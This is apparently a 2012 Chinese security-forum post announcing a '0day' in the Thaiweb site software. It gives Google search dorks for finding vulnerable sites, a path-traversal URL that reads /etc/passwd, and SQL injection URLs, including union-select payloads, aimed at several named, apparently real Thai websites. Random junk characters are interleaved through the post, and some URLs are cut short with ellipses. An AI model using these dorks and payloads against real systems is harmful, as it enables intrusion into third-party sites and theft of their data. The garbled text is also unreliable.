找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2180|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
4 r; P8 ^! R  v5 {
) s: Z5 I4 b# i$ {intext:powered by Thaiweb
7 [6 L# E# \! y) @2 o1 \) q
5 a4 ~# ?  S" L) d  F1 k! Kinurl:index.php?page=board.php0 J* t4 A7 L- O
" [9 j5 q+ Z- L- R2 y6 O
' W& F: |  d( ?5 z# s! V, [4 O% r3 g
  Q1 `3 M2 W& x1 r( O' W  @! P- G8 ?# H
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd. o4 g: Q* q9 [# e" N5 H3 f4 \

1 n% `4 N/ N3 V3 y$ Q6 Y! a
/ O2 \0 m" S2 v/ |$ t4 V8 N0 V: l  I! x
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'' s6 d# r/ t& d

4 o& y1 F. [5 ` , Q9 b2 y6 F, f

+ [1 f) S( g' W1 a$ Nhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
" f* u4 l8 [6 i: V8 n6 Y
8 H. X" g% G3 Chttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--/ a5 a2 {+ Q( }; T8 J6 U

1 x- v& B+ z% Y% X7 _4 [& S6 Ghttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
& U1 O5 t* x# X% }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表